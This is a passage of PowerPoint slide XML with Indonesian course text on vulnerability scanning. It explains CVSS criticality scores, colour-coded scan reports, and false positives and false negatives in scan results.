              <a:t> CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tambahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekritisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Common Vulnerability Scoring System (CVSS), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perbaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Forum Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (first.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cvss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Metrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intervensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Skor-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelompokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deskripsi</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192</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306326876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Positif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Negatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Tinjauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyelesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ringkasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penemuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kekritisannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>warna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelemahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditinjau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lingkup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kritis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Laporan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyertakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tautan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> detail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperbaiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intrusif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mahir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terutama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> false positive. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Positif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penilaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
